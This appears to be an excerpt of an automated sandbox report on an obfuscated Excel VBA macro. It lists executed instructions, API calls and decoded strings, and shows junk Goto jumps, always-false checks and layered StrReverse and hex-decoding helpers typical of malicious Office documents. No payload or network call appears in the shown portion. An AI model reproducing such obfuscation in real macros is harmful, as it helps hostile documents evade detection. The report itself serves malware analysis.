239	glyIerfQsONpQoaeEe = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6E5F734F595681"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
240	Goto FeYBDkqJRHnijhQelBccrikcBe
240	TmymkewtPzKPMYqLMVubETAGaiY:
242	aRqTyieSndTisbbNAcyK = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("5267434F7B476A63546D645B4F6F5A4B48"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
243	Goto yzxCngoRteuyAsRu
243	mVjIIjsEhAgDV:
244	ajeHQqKdYMtBCAFqkrU:
246	Goto VhbtdzjuzvHZnv
246	SgTFhDCeLdOStSf:
248	If 305004142 = 305004142 + 1 Then
248	End
248	Endif
249	Dim yDhttJNQIgyoYGJdGK as Double
250	Goto scYNhYOcmVVIuWsFTB
250	scYNhYOcmVVIuWsFTB:
252	PtIcvOJyenomrcUdGTSj = "phGVygiDfkyId"
253	Goto roKgExtEVlGtDbVzBhBH
253	QbApmgyvSoMS:
254	DknIkoDNiyiVvTRtbs:
256	Goto besNPZjeGQpJdQMsBB
256	FeYBDkqJRHnijhQelBccrikcBe:
258	Goto hxBEvUkdMuw
259	Goto GodxofsDmlZZAIUxQ
259	DQbKJxxZhtVpUsKQKI:
261	PtIcvOJyenomrcUdGTSj = "phGVygiDfkyId"
262	Goto URoYjolwNOkluSzdntMUJpllkoaSaEfQ
262	oRteuyAsRuZFtNEvJTCBpcCZlzhy:
263	nSqIiITNgPmVhmjuLai:
265	Goto pOCAuMJgCbhq
265	tBrQfgejGNUzL:
267	Goto paSbEgQhlnfE
268	Goto bfiZyNGqYbvYcqmVj
268	mgyvSoMSObesNZjeGQpJdQMsBBAFqjq:
270	aRqTyieSndTisbbNAcyK = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("5267434F7B476A63546D645B4F6F5A4B48"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
271	Goto ihxADvTjcLuwQtyLVrEeFcbCkBnrRrCw
271	LvrgAqhvFooNpLYmTlQbA:
272	fqZYLLnvHkDjGZlZQQj:
274	Goto mgyvSoMSObesNZjeGQpJdQMsBBAFqjq
274	UxQwTmymkewtPzKPMpqLMVubETAGaiYDyzxCn:
276	Goto sQKoqQdwEuaU
277	Goto oRteuyAsRuZFtNEvJTCBpcCZlzhy
277	wQtyLVrEseFcbC:
279	CLVQtJcwPJzfoonsdV = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6B6D527C4A59746C6E714B58"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
280	Goto BnrRrCwOLjEd
280	bfiZyNGqYbvYcqmVj:
281	sQKoqQdwEuaU:
283	Goto IjsEhAgDVvVhbtdzj
283	HUuuVerSmRqHiITNgOlU:
285	Goto OpLYnTlYcB
286	Goto mitKahisPKo
286	besNPZjeGQpJdQMsBB:
288	Goto KOdZIVvvQfr
289	Goto FqjqUihxADvTjcL
289	BnrRrCwOLjEd:
291	Goto ajeHQqKdYMtBCAFqkrU
292	Goto RduIeRczuYZFafndIRRQ
292	ONeTQOnQvtbPkQfpYYKKmuH:
294	Goto NrGntMUKqlm
295	Goto DiGYkZVPifCm
295	vCJaAAPFIAZChfMBV:
297	eQrNMpVnaeDepjByU = "PHDPgQENlg"
298	Goto DQbKJxxZhtVpUsKQKI
298	yzxCngoRteuyAsRu:
300	Goto nhzwSpNTPbetO
301	Goto JFtNEvJTCBpcCZlzhylp
301	pOCAuMJgCbhq:
303	Goto FTprAKFjyQlEyoTd
303	EktusxUbiMaZpsvnMb:
305	LsMRaOvDECHfmtQkjzD = "xQmfOwy"
306	Goto RBYHRYTgxLTUeBwcIOiqgLGHF
306	zvHZnvwFeYBDkq:
308	Goto TZJQYoOOeUQOoQvtbPkb
309	Goto RHnijhmQelBccrikc
309	ixpaHJfHLakESFsSp:
311	Goto fqZYLLnvHkDjGZlZQQj
312	Goto QxPBFfFQKdawS
312	roKgExtEVlGtDbVzBhBH:
314	eQrNMpVnaeDepjByU = "PHDPgQENlg"
315	Goto EktusxUbiMaZpsvnMb
315	URoYjolwNOkluSzdntMUJpllkoaSaEfQ:
317	zbxJYFQINnbZSliEbzE = "MPfABK"
318	Goto knfDhLvrgAq
318	IjsEhAgDVvVhbtdzj:
320	glyIerfQsONpQoaeEe = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6E5F734F595681"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
321	Goto zvHZnvwFeYBDkq
321	vFoobNpLYmT:
323	Goto DknIkoDNiyiVvTRtbs
324	Goto QbApmgyvSoMS
324	GodxofsDmlZZAIUxQ:
325	OpLYnTlYcB:
327	Goto TmymkewtPzKPMYqLMVubETAGaiY
327	iZyNGqYbvYc:
329	Goto nSqIiITNgPmVhmjuLai
330	Goto mVjIIjsEhAgDV
330	FqjqUihxADvTjcL:
331	nhzwSpNTPbetO:
333	Goto wQtyLVrEseFcbC
333	mitKahisPKo:
334	CmxCzKcdyzI:
336	Goto VdwEtZUUSYJPQ
336	RHnijhmQelBccrikc:
337	KOdZIVvvQfr:
339	Goto eIGodxofsDmlZZA
339	DiGYkZVPifCm:
340	paSbEgQhlnfE:
342	Goto CyKbcxzIgMqGntUJpllkoaSaEfQhknfD
342	FTprAKFjyQlEyoTd:
344	wcQYVbLELqQCSQZQqS = "idRmdTsba"
345	Goto chRKRwJIZcQvKDnVYsUan
345	wAOKtHhhHQdFZEcuTuF:
347	LsMRaOvDECHfmtQkjzD = "xQmfOwy"
348	Goto vCJaAAPFIAZChfMBV
348	LjEdVRduIeRczuYZFa:
349	hxBEvUkdMuw:
351	Goto BrQfgejGNUzLLb
351	JFtNEvJTCBpcCZlzhylp:
352	TZJQYoOOeUQOoQvtbPkb:
354	Goto CAuMJgCbhdorGcdnwrkDYqlaFOPNSDxEivuKOR
355	If 272437615 = 272437615 + 1 Then
355	End
355	Endif
356	Dim yRphepHVqenMGjlSmr as Boolean
357	Goto SEIiWTNfcAVtAyILZu
357	SEIiWTNfcAVtAyILZu:
358	szGlyxNQTLkzscKMhJOc:
360	xNOkmvSzdtagzHwc = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("46567454484F644F5B53"))), StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("32"))))))))))	StrReverse executed
361	Goto HUuuVerSmRqHiITNgOlU
361	chRKRwJIZcQvKDnVYsUan:
363	zbxJYFQINnbZSliEbzE = "MPfABK"
364	Goto SgTFhDCeLdOStSf
365	If 87036070 = 87036070 + 1 Then
365	End
365	Endif
366	Dim oWZtWaolUhHHiqDfeD as Date
367	Goto vGQLoEWqKEtZiihmXQ
367	vGQLoEWqKEtZiihmXQ:
368	RBYHRYTgxLTUeBwcIOiqgLGHF:
370	End Function

Function QhnsRALDv, APIs: 264, Strings: 119, Number of lines: 513, Relevance: 672.513

APIs	Meta Information
Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Chr
Asc
Mid
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$

Strings	Decrypted Strings
"31"	"1"
"33"	"3"
"38"	"8"
"39"	"9"
"5B62784A6C4242"	"[bxJlBB"
"6A7D775D565179"	"j}w]VQy"
"6C5C5D5175"	"l\]Qu"
"7559795A5D6C7C7C4F5C"	"uYyZ]l\|\|O\"
"7B485775545253"	"{HWuTRS"
"BqKArFPyy"
"CcdD"
"DbhpSg"
"DiOCY"
"JRe"
"NsSETYb"
"OQaxsVY"
"QVGzGlLxNTLlNsdYMh"
"QdZlBCYaGoQ"
"SpZkqmxOPl"
"TcoQknFRFDxPMj"
"UydbIRIzMQF"
"VgDycdJQjr"
"YBONeikcB"
"ZMmxrJGezY"
"diMTyKKae"
"jpIQGmh"
"jrDgzfC"
"yuFQYuEcIm"
"zVzwHKa"
"QVGzGlLxNTLlNsdYMh"
"39"	"9"
"7559795A5D6C7C7C4F5C"	"uYyZ]l\|\|O\"
"QVGzGlLxNTLlNsdYMh"
"TcoQknFRFDxPMj"
"YBONeikcB"
"zVzwHKa"
"YBONeikcB"
"ZMmxrJGezY"
"ZMmxrJGezY"
"zVzwHKa"
"TcoQknFRFDxPMj"
"DiOCY"
"JRe"
"33"	"3"
"7B485775545253"	"{HWuTRS"
"NsSETYb"
"31"	"1"
"5B62784A6C4242"	"[bxJlBB"
"38"	"8"
"6A7D775D565179"	"j}w]VQy"
"DiOCY"
"VgDycdJQjr"
"SpZkqmxOPl"
"JRe"
"33"	"3"
"6C5C5D5175"	"l\]Qu"
"39"	"9"
"7559795A5D6C7C7C4F5C"	"uYyZ]l\|\|O\"
"NsSETYb"
"SpZkqmxOPl"
"VgDycdJQjr"
"33"	"3"
"7B485775545253"	"{HWuTRS"
"31"	"1"
"5B62784A6C4242"	"[bxJlBB"
"33"	"3"
"6C5C5D5175"	"l\]Qu"
"UydbIRIzMQF"
"UydbIRIzMQF"
"yuFQYuEcIm"
"OQaxsVY"
"CcdD"
"DbhpSg"
"DbhpSg"
"OQaxsVY"
"CcdD"
"yuFQYuEcIm"
"jrDgzfC"
"BqKArFPyy"
"jpIQGmh"
"BqKArFPyy"
"diMTyKKae"
"38"	"8"
"6A7D775D565179"	"j}w]VQy"
"QdZlBCYaGoQ"
"diMTyKKae"
"jpIQGmh"
"jrDgzfC"
"QdZlBCYaGoQ"
"31"	"1"
"7753687A716E5263556D"	"wShzqnRcUm"
"35"	"5"
"704766484B67776A774A"	"pGfHKgwjwJ"
"sFPyymzViwevhlLz"
"yZYehZx"
"35"	"5"
"765A766F7F4A47475278"	"vZvo\x7fJGGRx"
"qHrtC"
"sFPyymzViwevhlLz"
"QfUAvvu"
"35"	"5"
"765A766F7F4A47475278"	"vZvo\x7fJGGRx"
"uNsQjvjga"
"38"	"8"
"717777615C59504A"	"qwwa\YPJ"
"qHrtC"
"35"	"5"
"704766484B67776A774A"	"pGfHKgwjwJ"
"38"	"8"
"717777615C59504A"	"qwwa\YPJ"
"QfUAvvu"
"39"	"9"
"4C5C7A5A4E556B555A5F"	"L\zZNUkUZ_"
"31"	"1"
"7753687A716E5263556D"	"wShzqnRcUm"
"39"	"9"
"4C5C7A5A4E556B555A5F"	"L\zZNUkUZ_"
"uNsQjvjga"
"yZYehZx"

Line	Instruction	Meta Information
534	Public Function QhnsRALDv(WbTn3SlMP as String, DIzYhzYcE as Integer)
535	Dim qGBSi0XYP as Integer	executed
536	For qGBSi0XYP = 1 To Len(WbTn3SlMP)	Len executed
537	If 248734015 = 248734015 + 1 Then
537	End
537	Endif
538	Dim FT1nFGelm as Integer
539	If 105444521 = 105444521 + 1 Then
539	End
539	Endif
540	Dim BMSOZqrNPYycGWDJck as Double
541	Goto cwvZHYKOnOZTliGbAr
541	cwvZHYKOnOZTliGbAr:
543	Goto MYpDZMQupSTAUaiYDMM
543	OkmvFAetLgztjOY:
544	dqePrNMoVnZdDepjB:
546	Goto QcMFMrEDTQaRqFyiQSnP
546	QpVzOvBUdSytusxib:
548	Goto xGeLoElrKSHnjj
549	Goto MoZptvnMpTE
549	FbzsozQgBoy:
551	ejgrIJfgpNuYnTatBrQR = "QVGzGlLxNTLlNsdYMh"
552	Goto QuwcwCJzfopnsPVdHUTk
552	oIzqEOxwkQxTgvc:
554	wvLORJjxqbIKfHMa = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7559795A5D6C7C7C4F5C"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("39"))))))))))))))))))))))	StrReverse executed
555	Goto gkJxvpHEbxVcYj
555	wyflEMCidechRZgwQQm:
557	ejgrIJfgpNuYnTatBrQR = "QVGzGlLxNTLlNsdYMh"
558	Goto fQwZDBjYsj
558	isNbOAcyxZGYJNoNaTm:
560	vvKADvUxcaHwQHyLVFEs = "TcoQknFRFDxPMj"
561	Goto FbzsozQgBoy
561	qiHVOzhjDglyv:
563	wFPKoDQqJEtZijhmQ = "YBONeikcB"
564	Goto rQQsANpJoM
564	QcMFMrEDTQaRqFyiQSnP:
566	Goto isNbOAcyxZGYJNoNaTm
566	YuepuqCTiqrAZ:
568	OcnVUIuVsESAREIiVTNg = "zVzwHKa"
569	Goto wyflEMCidechRZgwQQm
569	QlhQeDDfnzcvbyQqQcV:
571	wFPKoDQqJEtZijhmQ = "YBONeikcB"
572	Goto YuepuqCTiqrAZ
572	rOhthfZroKuFKHSklG:
573	LoFlrLTInjjimYRYDd:
575	Goto QpVzOvBUdSytusxib
575	rQQsANpJoM:
577	ItbdyaftDYmZLmIHkQi = "ZMmxrJGezY"
578	Goto QnuBgtsILOGfunQFHc
578	gkJxvpHEbxVcYj:
580	Goto jzDFxQmeOwyS
581	Goto OkmvFAetLgztjOY
581	MoZptvnMpTE:
582	LRaOuDECHflsQ:
584	Goto oIzqEOxwkQxTgvc
584	MYpDZMQupSTAUaiYDMM:
586	ItbdyaftDYmZLmIHkQi = "ZMmxrJGezY"
587	Goto QlhQeDDfnzcvbyQqQcV
587	nyhgTTvDPs:
589	Goto LoFlrLTInjjimYRYDd
